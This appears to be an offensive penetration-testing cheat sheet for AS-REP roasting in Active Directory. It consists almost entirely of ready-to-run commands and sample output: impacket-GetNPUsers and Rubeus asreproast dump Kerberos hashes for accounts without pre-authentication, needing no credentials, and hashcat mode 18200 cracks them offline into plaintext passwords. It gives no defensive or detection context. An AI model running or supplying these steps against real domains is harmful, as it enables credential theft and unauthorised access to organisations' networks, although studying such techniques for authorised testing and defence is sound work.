AS-REP ROASTING

Find AS-REP roastable users

Users with PreAuth disabled — Don't need any credentials for this

impacket-GetNPUsers <domain>/ -usersfile users.txt -no-pass -dc-ip <DC_IP> -outputfile asrep.txt
Example Output
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5
$krb5asrep$23$svc_backup@CORP.LOCAL:...

hashcat -m 18200 hash.txt rockyou.txt
svc_backup:Backup2024!
(No creds needed to get the hash!)

AS-REP roast with Rubeus

From Windows foothold — Alternative to impacket

.\Rubeus.exe asreproast /outfile:asrep.txt
Example Output
.\Rubeus.exe asreproast /outfile:asrep.txt
[*] Found 1 AS-REP roastable user
[*] User: svc_backup (no preauth)
[*] Hash written to asrep.txt

Crack AS-REP hashes

Offline cracking — User password

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Example Output
hashcat -m 18200 asrep.txt rockyou.txt
$krb5asrep$23$svc_backup@CORP.LOCAL:Backup2024!

Cracked! svc_backup:Backup2024!